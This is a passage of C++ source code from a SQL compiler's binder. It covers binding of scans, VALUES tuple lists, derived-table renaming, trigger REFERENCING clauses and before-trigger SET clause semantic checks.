if(!(idescList[i]->isPartitioned()) ) atleastonenonpartitionedaccess = TRUE; if (!atleastonenonpartitionedaccess) { *CmpCommon::diags() << DgSqlCode(-4320) << DgTableName(naTable->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return NULL; } } if (hbaseAccessOptions_) { if (hbaseAccessOptions_->isMaxVersions()) { hbaseAccessOptions_->setHbaseVersions ( getTableDesc()->getClusteringIndex()->getNAFileSet()->numMaxVersions() ); } } return boundExpr; } // Scan::bindNode() //---------------------------------------------------------------------------- RelExpr *Scan::bindExpandedMaterializedView(BindWA *bindWA, NATable *naTable) { CollHeap *heap = bindWA->wHeap(); MVInfoForDML *mvInfo = naTable->getMVInfo(bindWA); QualifiedName mvName(mvInfo->getNameOfMV(), 3, heap, bindWA); CorrName mvCorrName(mvName, heap, getTableName().getCorrNameAsString()); RelExpr *viewTree = mvInfo->buildMVSelectTree(); viewTree = new(heap) RenameTable(TRUE, viewTree, mvCorrName); viewTree->addSelPredTree(removeSelPredTree()); RelExpr *boundExpr = viewTree->bindNode(bindWA); if (bindWA->errStatus()) return this; if (naTable->getClusteringIndex()->hasSyskey()) { // In case the MV on top of this MV is an MJV, it needs the SYSKEY // column of this MV. Since the SYSKEY column is not projected from // the select list of this MV, just fake it. It's value will never be // used anyway - just it's existance. ConstValue *dummySyskey = new(heap) ConstValue(0); dummySyskey->changeType(new(heap) SQLLargeInt()); ItemExpr *dummySyskeyCol = dummySyskey->bindNode(bindWA); if (bindWA->errStatus()) return this; ColRefName syskeyName("SYSKEY", mvCorrName); boundExpr->getRETDesc()->addColumn(bindWA, syskeyName, dummySyskeyCol->getValueId(), SYSTEM_COLUMN); } bindWA->getCurrentScope()->setRETDesc(boundExpr->getRETDesc()); return boundExpr; } //---------------------------------------------------------------------------- // This Scan needs to project the CurrentEpoch column. // Create and bind the CurrentEpoch function void Scan::projectCurrentEpoch(BindWA *bindWA) { ItemExpr *currEpoch = new(bindWA->wHeap()) GenericUpdateOutputFunction(ITM_CURRENTEPOCH); currEpoch->bindNode(bindWA); // Add it to the RETDesc ColRefName virtualColName(InliningInfo::getEpochVirtualColName()); getRETDesc()->addColumn(bindWA, virtualColName, currEpoch->getValueId()); // And force the generator to project it even though it is not // a column in the IndexDesc. ValueIdSet loggingCols; loggingCols.insert(currEpoch->getValueId()); setExtraOutputColumns(loggingCols); } // ----------------------------------------------------------------------- // methods for class Tuple // ----------------------------------------------------------------------- // Genesis 10-990226-4329 and 10-000221-6676. static RelExpr *checkTupleElementsAreAllScalar(BindWA *bindWA, RelExpr *re) { if (!re) return NULL; RETDesc *rd = re->getRETDesc(); CMPASSERT(rd); // an empty tuple is okay (dummy for Triggers, e.g.) const ColumnDescList &cols = *rd->getColumnList(); for (CollIndex i = cols.entries(); i--; ) { ColumnDesc *col = cols[i]; Subquery *subq = (Subquery *)cols[i]->getValueId().getItemExpr(); if (subq->isASubquery()) { if (cols.entries() > 1 && subq->getDegree() > 1) { // 4125 The select list of a subquery in a VALUES clause must be scalar. *CmpCommon::diags() << DgSqlCode(-4125); bindWA->setErrStatus(); return NULL; } else if (cols.entries() == 1) { // if cols.entries() > 1 && subq->getDegree() > 1 // we do not want to make the transformation velow. We want to keep the // values clause, so that it cann be attached by a tsj to the subquery // during transform. CMPASSERT(subq->isARowSubquery()); if (CmpCommon::getDefault(COMP_BOOL_137) == DF_ON) { ValueIdList subqSelectList; RETDesc *subqRD = subq->getSubquery()->getRETDesc()->nullInstantiate( bindWA, TRUE/*forceCast for GenRelGrby*/, subqSelectList); subq->getSubquery()->setRETDesc(subqRD); ItemExpr *agg = new(bindWA->wHeap()) Aggregate(ITM_ONE_ROW, subqSelectList.rebuildExprTree()); RelExpr * gby = new(bindWA->wHeap()) GroupByAgg(subq->getSubquery(), REL_GROUPBY, NULL, agg); NABoolean save = bindWA->getCurrentScope()->context()->inTupleList(); bindWA->getCurrentScope()->context()->inTupleList() = TRUE; gby = gby->bindNode(bindWA); bindWA->getCurrentScope()->context()->inTupleList() = save; return gby; } else { return subq->getSubquery(); } } } } return re; } RelExpr *Tuple::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // Used by rowsets. We search for occurrences of arrays within this node to // replace them with scalar variables if (bindWA->getHostArraysArea() && !bindWA->getHostArraysArea()->done()) { RelExpr *boundExpr = bindWA->getHostArraysArea()->modifyTupleNode(this); if (boundExpr) return checkTupleElementsAreAllScalar(bindWA, boundExpr); } bindChildren(bindWA); if (bindWA->errStatus()) return this; // Detach the item expression tree for the value list and bind it. // We use counterForRowValues() and pass in parent, for DEFAULT processing // (Ansi 7.1 SR 1). // CollIndex counterRowVals = 0; CMPASSERT(!bindWA->getCurrentScope()->context()->counterForRowValues()); bindWA->getCurrentScope()->context()->counterForRowValues() = &counterRowVals; // setRETDesc(bindRowValues(bindWA, removeTupleExprTree(), tupleExpr(), this, FALSE)); if (bindWA->errStatus()) return this; // bindWA->getCurrentScope()->context()->counterForRowValues() = NULL; // Do NOT set currently scoped RETDesc to this VALUES(...) RETDesc -- // makes "select * from t where ((values(1)),a) = (1,2);" // fail with error 4001 "column A not found, no named tables in scope" // // bindWA->getCurrentScope()->setRETDesc(getRETDesc()); // Bind the base class. // RelExpr *boundExpr = bindSelf(bindWA); // -- Trigger if (bindWA->errStatus()) return this; // //for case 10-020716-5497 RelExpr *newExpr = checkTupleElementsAreAllScalar(bindWA, boundExpr); //before doing anything with newExpr make sure it is not null it can //be null if there is an error incheckTupleElementsAreAllScalar. getGroupAttr()->addCharacteristicOutputs(tupleExpr()); return newExpr; } // Tuple::bindNode() // ----------------------------------------------------------------------- // methods for class TupleList // ----------------------------------------------------------------------- RelExpr *TupleList::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } RelExpr * boundExpr = NULL; bindChildren(bindWA); if (bindWA->errStatus()) return this; ExprValueId eVid(tupleExprTree()); ItemExprTreeAsList tupleList(&eVid, ITM_ITEM_LIST); NABoolean castTo = castToList().entries() > 0; if (tupleExprTree()->containsSubquery() || tupleExprTree()->containsUDF() #ifndef NDEBUG || getenv("UNIONED_TUPLES") #endif ) { // Make a union'ed tree of all the tuples in tupleList. ## // This is done coz TupleList doesn't handle transformation ## // of subqueries in tuples correctly yet. ## CollIndex nTupleListEntries = (CollIndex)tupleList.entries(); for (CollIndex i = 0; i < nTupleListEntries ; i++) { ItemExpr *ituple = tupleList[i]->child(0)->castToItemExpr(); RelExpr *rtuple = new(bindWA->wHeap()) Tuple(ituple); rtuple = rtuple->bindNode(bindWA); if (bindWA->errStatus()) return this; // If INSERTing a TupleList, make some Assign's (even tmp's work!) // to do some error-checking for MP-NCHAR-as-single-byte target columns. // // Similar code exists in // (a) the loop further down, (b) TupleList::codeGen() // and yes, it needs to be in all three places. // // NOTE: tmpAssign MUST BE ON HEAP -- // Cannot be done with a stack-allocated tmpAssign // because ItemExpr destructor will delete children, // which we (and parent) are still referencing! if (castTo) { const ColumnDescList &itms = *rtuple->getRETDesc()->getColumnList(); for (CollIndex j = 0; j < (CollIndex)itms.entries(); j++) { ValueId src = itms[j]->getValueId(); Assign *tmpAssign = new(bindWA->wHeap()) Assign(castToList()[j].getItemExpr(), src.getItemExpr()); tmpAssign = (Assign *)tmpAssign->bindNode(bindWA); if (bindWA->errStatus()) return this; } } if (!boundExpr) boundExpr = rtuple; else boundExpr = new(bindWA->wHeap()) Union(boundExpr, rtuple); } // for loop over tupleList CMPASSERT(boundExpr); return boundExpr->bindNode(bindWA); } // containsSubquery // Detach the item expression tree for the value list and bind it. // We use counterForRowValues() and pass in parent, for DEFAULT processing // (Ansi 7.1 SR 1). // CollIndex counterRowVals = 0; CMPASSERT(!bindWA->getCurrentScope()->context()->counterForRowValues()); bindWA->getCurrentScope()->context()->counterForRowValues() = &counterRowVals; // tupleExprTree() contains a list of tuples. // Each tuple is also a list of values (this list may contain one item). // Bind all values in all the tuples. // Check that the number of elements in each tuple is the same, // and that the types of corresponding elements are compatible. // numberOfTuples_ = tupleList.entries(); CollIndex prevTupleNumEntries = NULL_COLL_INDEX; // A list of ValueIdUnions nodes. Will create as many as there are // entries in each tuple. The valIds from corresponding elements of // the tuples will be added so that each ValueIdUnion represents a // column of the tuple virtual table. Used to determine the // union-compatible type to be used for the result type produced by // the tuplelist. // ItemExprList vidUnions(bindWA->wHeap()); ValueIdUnion *vidUnion; CollIndex i = 0; CollIndex nEntries = (CollIndex)tupleList.entries() ; for (i = 0; i < nEntries ; i++) { counterRowVals = 0; ValueIdList vidList; ItemExpr *tuple = tupleList[i]->child(0)->castToItemExpr(); tuple->convertToValueIdList(vidList, bindWA, ITM_ITEM_LIST, this); if (bindWA->errStatus()) return NULL; if (prevTupleNumEntries == NULL_COLL_INDEX) { prevTupleNumEntries = vidList.entries(); } else if (prevTupleNumEntries != vidList.entries()) { // 4126 The row-value-ctors of a VALUES must be of equal degree. *CmpCommon::diags() << DgSqlCode(-4126); bindWA->setErrStatus(); return NULL; } // Genesis 10-980611-7153 if (castTo && prevTupleNumEntries != castToList().entries()) break; for (CollIndex j = 0; j < prevTupleNumEntries; j++) { // If any unknown type in the tuple, coerce it to the target type. // Also do same MP-NCHAR magic as above. if (castTo) { ValueId src = vidList[j]; src.coerceType(castToList()[j].getType()); // tmpAssign MUST BE ON HEAP -- see note above! Assign *tmpAssign = new(bindWA->wHeap()) Assign(castToList()[j].getItemExpr(), src.getItemExpr()); tmpAssign = (Assign *)tmpAssign->bindNode(bindWA); if (bindWA->errStatus()) return this; } if(i == 0) { ValueIdList vids; // Create an empty ValueIdUnion. Will create as many as there // are entries in each tuple. Add the valIds from // corresponding elements of the tuples so that each // ValueIdUnion represents a column of the tuple virtual // table. // vidUnion = new(bindWA->wHeap()) ValueIdUnion(vids, NULL_VALUE_ID); vidUnion->setWasDefaultClause(TRUE); vidUnions.insertAt(j, vidUnion); } // Add the valIds from corresponding elements of the tuples so // that each ValueIdUnion represents a column of the tuple // virtual table. // vidUnion = (ValueIdUnion *)vidUnions[j]; vidUnion->setSource((Lng32)i, vidList[j]); if (NOT vidList[j].getItemExpr()->wasDefaultClause()) vidUnion->setWasDefaultClause(FALSE); } // for loop over entries in tuple } // for loop over tupleList if (castTo && prevTupleNumEntries != castToList().entries()) { // 4023 degree of row value constructor must equal that of target table *CmpCommon::diags() << DgSqlCode(-4023) << DgInt0((Lng32)prevTupleNumEntries) << DgInt1((Lng32)castToList().entries()); bindWA->setErrStatus(); return NULL; } // do INFER_CHARSET fixup if (!doInferCharSetFixup(bindWA, CharInfo::ISO88591, prevTupleNumEntries, tupleList.entries())) { return NULL; } ItemExpr * outputList = NULL; for (CollIndex j = 0; j < prevTupleNumEntries; j++) { // Get the ValueIdUnion node corresponding to this column of the // tuple list virtual table // vidUnion = (ValueIdUnion *)vidUnions[j]; if (castTo) { // Make sure the place holder type can support all the values in // the tuple list and target column // vidUnion->setSource(numTuples(), castToList()[j]); } vidUnion->bindNode(bindWA); if (bindWA->errStatus()) return NULL; if (castTo) { // Check that the source and target types are compatible. // Cannot be done with a stack-allocated tmpAssign // because ItemExpr destructor will delete children, // which we (and parent) are still referencing! Assign *tmpAssign = new(bindWA->wHeap()) Assign(castToList()[j].getItemExpr(), vidUnion); if ( CmpCommon::getDefault(ALLOW_IMPLICIT_CHAR_CASTING) == DF_ON ) { tmpAssign->tryToDoImplicitCasting(bindWA); } const NAType *targetType = tmpAssign->synthesizeType(); if (!targetType) { bindWA->setErrStatus(); return NULL; } } NAType *phType = vidUnion->getValueId().getType().newCopy(bindWA->wHeap()); NATypeToItem *placeHolder = new(bindWA->wHeap()) NATypeToItem(phType); Cast * cnode; if (castTo) { cnode = new(bindWA->wHeap()) Cast(placeHolder, phType, ITM_CAST, TRUE); if (vidUnion->getValueId().getItemExpr()->wasDefaultClause()) cnode->setWasDefaultClause(TRUE); } else cnode = new(bindWA->wHeap()) Cast(placeHolder, phType); cnode->setConstFoldingDisabled(TRUE); cnode->bindNode(bindWA); if (!outputList) outputList = cnode; else outputList = new(bindWA->wHeap()) ItemList(outputList, cnode); } setRETDesc(bindRowValues(bindWA, outputList, tupleExpr(), this, FALSE)); if (bindWA->errStatus()) return this; bindWA->getCurrentScope()->context()->counterForRowValues() = NULL; // Bind the base class. // boundExpr = bindSelf(bindWA); if (bindWA->errStatus()) return this; // need to add system columns as well....? NABoolean inSubquery = FALSE; BindScope *currScope = bindWA->getCurrentScope(); BindScope *prevScope = bindWA->getPreviousScope(currScope); if (prevScope) inSubquery = prevScope->context()->inSubquery(); if (inSubquery) { // need to change tupleExpr() & make it null-instantiated as RETDesc stores // null instantiated columns (most probably these are constants, but not // necessarily) const ColumnDescList *viewColumns = getRETDesc()->getColumnList(); tupleExpr().clear(); for (CollIndex k=0; k < viewColumns->entries(); k++) { ValueId vid = (*viewColumns)[k]->getValueId(); // Special logic in Normalizer to optimize away a LEFT JOIN is not to // be explored there, as this is not a LEFT JOIN // Genesis case: 10-010312-1675 // If the query were to be a LEFT JOIN, we would not be here if (vid.getItemExpr()->getOperatorType() == ITM_INSTANTIATE_NULL) { ((InstantiateNull *)vid.getItemExpr())->NoCheckforLeftToInnerJoin = TRUE; } tupleExpr().insert(vid); } } getGroupAttr()->addCharacteristicOutputs(tupleExpr()); return boundExpr; } // TupleList::bindNode() // set vidlist = ith tuple of this tuplelist and return TRUE RelExpr* TupleList::getTuple (BindWA *bindWA, ValueIdList& vidList, CollIndex i) { ExprValueId eVid(tupleExprTree()); ItemExprTreeAsList tupleList(&eVid, ITM_ITEM_LIST); ItemExpr *tuple = tupleList[i]->child(0)->castToItemExpr(); tuple->convertToValueIdList(vidList, bindWA, ITM_ITEM_LIST, this); return bindWA->errStatus() ? NULL : this; } // set needsFixup to TRUE iff tuplelist needs INFER_CHARSET fixup RelExpr* TupleList::needsCharSetFixup(BindWA *bindWA, CollIndex arity, CollIndex nTuples, NAList<NABoolean> &strNeedsFixup, NABoolean &needsFixup) { // assume it needs no INFER_CHARSET fixup until proven otherwise needsFixup = FALSE; if (CmpCommon::wantCharSetInference()) { CollIndex t, x; for (x = 0; x < arity; x++) { // initialize strNeedsFixup.insert(FALSE); } // go thru tuplelist looking for unprefixed string literals for (t = 0; t < nTuples; t++) { // get tuple ValueIdList tup; if (!getTuple(bindWA, tup, t)) { return NULL; // something wrong } else { // go thru columns of tuple looking for unprefixed string literals for (x = 0; x < arity; x++) { if (!strNeedsFixup[x] && tup[x].inferableCharType()) { strNeedsFixup[x] = TRUE; needsFixup = TRUE; } } } } } return this; // all OK } // find fixable strings' inferredCharTypes RelExpr* TupleList::pushDownCharType(BindWA *bindWA, enum CharInfo::CharSet cs, NAList<const CharType*> &inferredCharType, NAList<NABoolean> &strNeedsFixup, CollIndex arity, CollIndex nTuples) { // mimic CharType::findPushDownCharType() logic const CharType* dctp = CharType::desiredCharType(cs); NAList<const CharType*> sampleCharType(CmpCommon::statementHeap(),arity); NAList<Int32> total(CmpCommon::statementHeap(),arity); NAList<Int32> ct (CmpCommon::statementHeap(),arity); CollIndex t, x; for (x = 0; x < arity; x++) { // initialize total.insert(0); ct.insert(0); sampleCharType.insert(NULL); } // go thru tuplelist looking for fixable strings' inferredCharType for (t = 0; t < nTuples; t++) { // get tuple ValueIdList tup; if (!getTuple(bindWA, tup, t)) { return NULL; // something wrong } else { // go thru tuple looking for fixable strings' inferredCharType for (x = 0; x < arity; x++) { if (strNeedsFixup[x]) { total[x] += 1; const CharType *ctp; if (tup[x].hasKnownCharSet(&ctp)) { ct[x] += 1; if (sampleCharType[x] == NULL) { sampleCharType[x] = ctp; } } } } } } for (x = 0; x < arity; x++) { if (ct[x] == total[x]) { // all have known char set or none need fixup inferredCharType.insert(NULL); // nothing to fix } else { inferredCharType.insert(sampleCharType[x] ? sampleCharType[x] : dctp); } } return this; // all OK } // do INFER_CHARSET fixup RelExpr* TupleList::doInferCharSetFixup(BindWA *bindWA, enum CharInfo::CharSet cs, CollIndex arity, CollIndex nTuples) { NABoolean needsFixup; NAList<NABoolean> strNeedsFixup(CmpCommon::statementHeap(),arity); RelExpr *result = needsCharSetFixup (bindWA, arity, nTuples, strNeedsFixup, needsFixup); if (!result || // something went wrong !needsFixup) { // no INFER_CHARSET fixup needed return result; } else { // some string literal needs INFER_CHARSET fixup NAList<const CharType*> inferredCharType(CmpCommon::statementHeap(),arity); if (!pushDownCharType(bindWA, cs, inferredCharType, strNeedsFixup, arity, nTuples)) { return NULL; // something went wrong } else { // go thru tuplelist fixing up literals' char sets CollIndex t, x; for (t = 0; t < nTuples; t++) { // get tuple ValueIdList tup; if (!getTuple(bindWA, tup, t)) { return NULL; // something went wrong } else { // go thru tuple fixing up literals' char sets for (x = 0; x < arity; x++) { if (strNeedsFixup[x] && tup[x].inferableCharType()) { // coerce literal to have column's inferred char set tup[x].coerceType(*(inferredCharType[x]), NA_CHARACTER_TYPE); } } } } } } return this; } // ----------------------------------------------------------------------- // member functions for class RenameTable // ----------------------------------------------------------------------- RelExpr *RenameTable::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); // -- Triggers return this; } // // Create a new table name scope. // bindWA->getCurrentScope()->xtnmStack()->createXTNM(); // code to enforce the specification that if an index expression is specified // with a rowset and the index is included in the derived table, the index // must be the last column of the derived column list if((getTableName().getCorrNameAsString() != "Rowset___") && (getArity() != 0)) { if(child(0)->getOperatorType() == REL_ROWSET) { NAString indexExpr(bindWA->wHeap()); NAString lastString("", bindWA->wHeap()); ItemExpr *tempPtr; indexExpr = ((Rowset *)getChild(0))->getIndexName(); if((indexExpr != "") && newColNamesTree_) { for (tempPtr = newColNamesTree_; tempPtr; tempPtr=tempPtr->child(1)) { Int32 arity = tempPtr->getArity(); if(arity == 1) { lastString = ((RenameCol *)tempPtr)->getNewColRefName()->getColName(); } } if(indexExpr != lastString) { *CmpCommon::diags() << DgSqlCode(-30012) << DgString0(indexExpr) << DgString1(getTableName().getCorrNameAsString()); bindWA->setErrStatus(); return NULL; } } } } // // Bind the child nodes. // bindChildren(bindWA); if (bindWA->errStatus()) return this; // // Remove the table name scope. // bindWA->getCurrentScope()->xtnmStack()->removeXTNM(); // // Create the result table. // RETDesc *resultTable = new (bindWA->wHeap()) RETDesc(bindWA); const RETDesc &sourceTable = *child(0)->getRETDesc(); const CorrName &tableName = getTableName(); ItemExpr *derivedColTree = removeColNameTree(); ItemExprList derivedColList(bindWA->wHeap()); const NAString *simpleColNameStr; CollIndex i; // // Check that there are an equal number of columns to values. // if (derivedColTree) { derivedColList.insertTree(derivedColTree); if (derivedColList.entries() != sourceTable.getDegree()) { // 4016 The number of derived columns must equal the degree of the derived table. *CmpCommon::diags() << DgSqlCode(-4016) #pragma nowarn(1506) // warning elimination << DgInt0(derivedColList.entries()) << DgInt1(sourceTable.getDegree()); #pragma warn(1506) // warning elimination bindWA->setErrStatus(); delete resultTable; return this; } } // // Insert the derived column names into the result table. // By ANSI 6.3 SR 6 (applies to explicit derived column list), // duplicate names are not allowed. // If user did not specify a derived column name list, // expose the select list's column names (implicit derived column list); // ANSI does not say that these cannot be duplicates -- // if there's a later (i.e. in an outer scope) reference to a duplicately // named column, ColReference::bindNode will issue an error // (in particular, if all references are to constants, e.g. "count(*)", // then duplicates are not disallowed in the implicit derived column list!). // // When Create View DDL uses this Binder, we must enforce // ANSI 11.19 SR 8 + 9, clearly disallowing dups/ambigs // (and disallowing implem-dependent names, i.e. our unnamed '(expr)' cols!). // for (i = 0; i < sourceTable.getDegree(); i++) { // if (derivedColTree) { // explicit derived column list CMPASSERT(derivedColList[i]->getOperatorType() == ITM_RENAME_COL); simpleColNameStr = &((RenameCol *) derivedColList[i])-> getNewColRefName()->getColName(); if (*simpleColNameStr != "") { // named column, not an expression if (resultTable->findColumn(*simpleColNameStr)) { ColRefName errColName(*simpleColNameStr, tableName); // 4017 Derived column name $ColumnName was specified more than once. *CmpCommon::diags() << DgSqlCode(-4017) << DgColumnName(errColName.getColRefAsAnsiString()); bindWA->setErrStatus(); delete resultTable; return this; } } } else // implicit derived column list simpleColNameStr = &sourceTable.getColRefNameObj(i).getColName(); // ColRefName colRefName(*simpleColNameStr, tableName); ValueId valId = sourceTable.getValueId(i); resultTable->addColumn(bindWA, colRefName, valId); } // for-loop // // Insert system columns similarly, completely ignoring dup names. // const ColumnDescList &sysColList = *sourceTable.getSystemColumnList(); for (i = 0; i < sysColList.entries(); i++) { simpleColNameStr = &sysColList[i]->getColRefNameObj().getColName(); if (NOT resultTable->findColumn(*simpleColNameStr)) { ColRefName colRefName(*simpleColNameStr, tableName); ValueId valId = sysColList[i]->getValueId(); // (slight diff from the resultTable->addColumn(bindWA, colRefName, valId, SYSTEM_COLUMN); //above) } } setRETDesc(resultTable); // MVs -- // When binding INTERNAL REFRESH commands, the SYSKEY and @OP columns should // be propageted to the scope above, even when they are not specified in the // select list. if (bindWA->isPropagateOpAndSyskeyColumns()) getRETDesc()->propagateOpAndSyskeyColumns(bindWA, FALSE); bindWA->getCurrentScope()->setRETDesc(resultTable); // // Insert the table name into the XTNM, // casting away constness on the correlation name // in order to have default cat+sch filled in. // bindWA->getCurrentScope()->getXTNM()->insertNames(bindWA, (CorrName &)tableName); if (bindWA->errStatus()) { delete resultTable; return this; } if (getViewNATable()) { const NATable * natable = getViewNATable() ; const ColumnDescList &columnsRET = *(resultTable->getColumnList()); for (i = 0; i < natable->getColumnCount(); i++) { columnsRET[i]->setViewColPosition( ((natable->getNAColumnArray())[i])->getPosition()); columnsRET[i]->setViewFileName((const char*)natable->getViewFileName()); } } // // Bind the base class. // return bindSelf(bindWA); } // RenameTable::bindNode() // ----------------------------------------------------------------------- // member functions for class RenameReference // ----------------------------------------------------------------------- // This method replaces the RETDesc of the current scope, with a new RETDesc // that contains the columns of the transition values (OLD@ and NEW@) but // with correlation names specified by the user in the REFERENCING clause // of the row trigger. void RenameReference::prepareRETDescWithTableRefs(BindWA *bindWA) { CollIndex refsToFind = getRefList().entries(); CollIndex refsFound = 0; RETDesc *retDesc; // First find the NEW@ and OLD@ tables in one of the scopes. BindScope *scope = bindWA->getCurrentScope(); // For each BindScope, while ((scope!=NULL) && (refsToFind > refsFound)) { // until we find all the references. retDesc = scope->getRETDesc(); // Skip if an empty RETDesc if ((retDesc!=NULL) && !retDesc->isEmpty()) { // For each reference to change for (CollIndex i=0; i<refsToFind; i++) // Find the table name in the RETDesc, and save a pointer to it's // column list in the TableRefName object. if(getRefList().at(i).lookupTableName(retDesc)) refsFound++; } // Get the next BindScope to search. scope = bindWA->getPreviousScope(scope); } // while not done RETDesc *resultTable = new (bindWA->wHeap()) RETDesc(bindWA); // Create an empty RETDesc for the current scope. bindWA->getCurrentScope()->setRETDesc(resultTable); // For each table reference, add to the RETDesc of the current scope, the // columns of the columns of the referenced tables with the new referencing // names as correlation names. for (CollIndex i=0; i<refsToFind; i++) getRefList()[i].bindRefColumns(bindWA); } // The RenaneReference node renames values flowing down through it. // It is used above a row trigger body, to implement the REFERENCING clause // of the trigger definition - renaming the OLD and NEW transition variables // to user specified names. // // This bind is top-down, so we first prepare the RETDesc, and then bind // the children using this RETDesc. RelExpr *RenameReference::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // Save the current RETDesc. RETDesc *prevRETDesc = bindWA->getCurrentScope()->getRETDesc(); // Replace the RETDesc of the current scope with one that contains the user // names (MY_NEW, MY_OLD) instead of the reference names (NEW@, OLD@). prepareRETDescWithTableRefs(bindWA); // Bind the child nodes, in a new BindScope. // If we don't open a new scope here, the bindChildren() method will // overwrite the RETDesc of the current scope with NULL. bindWA->initNewScope(); bindChildren(bindWA); if (bindWA->errStatus()) return this; // Bind the base class. RelExpr *boundNode = bindSelf(bindWA); // Save this scope's outer references before removing the scope. const ValueIdSet myOuterRefs = bindWA->getCurrentScope()->getOuterRefs(); setRETDesc(bindWA->getCurrentScope()->getRETDesc()); bindWA->removeCurrentScope(); bindWA->getCurrentScope()->setRETDesc(prevRETDesc); // Now merge the outer references into the previous scope. bindWA->getCurrentScope()->mergeOuterRefs(myOuterRefs); return boundNode; } // RenameReference::bindNode() // ----------------------------------------------------------------------- // member functions for class BeforeTrigger // ----------------------------------------------------------------------- ////////////////////////////////////////////////////////////////////////////// // Find the name and position of a column SET to by this before Trigger. // The targetColName is an output parameter, saving the bindSetClause() // method the work of finding the column name. // The naTable parameter is NULL during DML. and is only used for DDL // semantic checks. ////////////////////////////////////////////////////////////////////////////// Lng32 BeforeTrigger::getTargetColumn(CollIndex i, // Index of Assign expr. ColRefName* targetColName, const NATable *naTable) { ItemExpr *currentAssign = setList_->at(i); CMPASSERT(currentAssign->getOperatorType() == ITM_ASSIGN); ItemExpr *targetColReference = currentAssign->child(0); CMPASSERT(targetColReference->getOperatorType() == ITM_REFERENCE); ColRefName& targetColRefName = ((ColReference *)targetColReference)->getColRefNameObj(); if (targetColName != NULL) // return the column name to the binder. *targetColName = targetColRefName; const NAString& colName = targetColRefName.getColName(); // If called during DML binding of the BeforeTrigger node, the // column position will not be used, because the check for duplicate // SET columns was done in DDL time. if (naTable == NULL) return 0; // We get here from DDL binding of the BeforeTrigger node, or from // the Inlining code. NAColumn *colObj = naTable->getNAColumnArray().getColumn(colName); // If colObj is NULL, it's a bad column name. if (colObj == NULL) return -1; return colObj->getPosition(); } ////////////////////////////////////////////////////////////////////////////// // This method is called only during DDL (CREATE TRIGGER) of a before trigger // with a SET clause. // Each of the columns updated by the SET clause goes through several // semantic checks, that cannot be done in the parser. ////////////////////////////////////////////////////////////////////////////// void BeforeTrigger::doSetSemanticChecks(BindWA *bindWA, RETDesc *origRETDesc) { UpdateColumns localCols = UpdateColumns(FALSE); ColRefName currentCol; const NATable *scanNaTable = NULL; NABoolean isUpdateOp=FALSE; Scan *scanNode = getLeftmostScanNode(); CMPASSERT(scanNode != NULL); scanNaTable = scanNode->getTableDesc()->getNATable(); CorrName oldCorr(OLDCorr); if (origRETDesc->getQualColumnList(oldCorr)) isUpdateOp = TRUE; for (CollIndex i=0; i<setList_->entries(); i++) { // Get the name and position of the Assign target column. Lng32 targetColPosition = getTargetColumn(i, &currentCol, scanNaTable); if (!currentCol.getCorrNameObj().isATriggerTransitionName(bindWA, TRUE)) { // 11017 Left hand of SET assignment must be qualified with the name of the NEW transition variable *CmpCommon::diags() << DgSqlCode(-11017) ; // must be NEW name bindWA->setErrStatus(); return; } if (targetColPosition == -1) { // 11022 Column $0~ColumnName is not a column in table $0~TableName NAString tableName = scanNaTable->getTableName().getQualifiedNameAsString(); *CmpCommon::diags() << DgSqlCode(-11022) << DgColumnName(currentCol.getColName()) << DgTableName(tableName); bindWA->setErrStatus(); return; } // We need to check for duplicate SET columns in DDL time only. if (localCols.contains(targetColPosition)) { // 4022 column specified more than once *CmpCommon::diags() << DgSqlCode(-4022) << DgColumnName(currentCol.getColName()); bindWA->setErrStatus(); return; } localCols.addColumn(targetColPosition); // Is this a SET into a column that is part of the clustering key? // This is only allowed on Inserts, not on Updates (Deletes never get here). if (isUpdateOp && scanNaTable->getNAColumnArray().getColumn(targetColPosition)->isClusteringKey()) { // 4033 Column $0~ColumnName is a primary or clustering key column and cannot be updated. *CmpCommon::diags() << DgSqlCode(-4033) << DgColumnName(currentCol.getColName()); bindWA->setErrStatus(); return; } } } ////////////////////////////////////////////////////////////////////////////// // This method is called for before triggers that use the SET clause. // For each column to be set using SET MYNEW.<colname> = <setExpr> do: // 1. Find NEW@.<colname> in origRETDesc. // 2. Verify that there is such a column, and that the user is allowd to // change it. // 3. Get the column's ItemExpr expression, and save it in passThruExpr. // 4. Create an ItemExpr tree as follows: // case // | // IfThenElse // / | \ // condition setExpr passThruExpr // // where condition is the WHEN clause expression. // 5. Bind this new expression in the RETDesc of the current scope. // 6. remove NEW@.<colname> from origRETDesc, and re-insert it as the new // expression. ////////////////////////////////////////////////////////////////////////////// void BeforeTrigger::bindSetClause(BindWA *bindWA, RETDesc *origRETDesc, CollHeap *heap) { // Semantic checks are only needed during DDL. if (bindWA->inDDL()) { doSetSemanticChecks(bindWA, origRETDesc); if (bindWA->errStatus()) return; } CorrName newCorr(NEWCorr); const TableRefName *newRefName = getRefList().findTable(newCorr); CMPASSERT(newRefName!=NULL); CorrName newRef = newRefName->getTableCorr(); ColRefName currentCol; // For each Assign expression in the list. for (CollIndex i=0; i<setList_->entries(); i++) { // Get the name and position of the Assign target column. Lng32 targetColPosition = getTargetColumn(i, &currentCol, NULL); currentCol.getCorrNameObj() = newRef; ItemExpr *setExpr = setList_->at(i)->child(1); // Find the current value of this NEW@ column. ColumnNameMap *currentColExpr = origRETDesc->findColumn(currentCol); CMPASSERT(currentColExpr != NULL); // Otherwise we would have been thrown with error 11022 - see above. ItemExpr *passThruExpr = currentColExpr->getValueId().getItemExpr(); ItemExpr *colExpr = NULL; if (whenClause_ == NULL) // After we add the support for reading the trigger status from // the resource fork, and adding it to the condition, we should // never get here. colExpr = setExpr; else { IfThenElse *ifExpr = new(heap) IfThenElse(whenClause_, setExpr, passThruExpr); colExpr = new(heap) Case(NULL, ifExpr); } colExpr = colExpr->bindNode(bindWA); if (bindWA->errStatus()) return; // Now remove and re-insert the column to the original RETDesc, // that will be restored at the bottom of the method. currentCol.getCorrNameObj() = newCorr; origRETDesc->delColumn(bindWA, currentCol, USER_COLUMN); origRETDesc->addColumn(bindWA, currentCol, colExpr->getValueId()); // force binding of the assign here so that type incompatability is caught // during DDL if (bindWA->inDDL()) { ItemExpr *currentAssign = setList_->at(i); 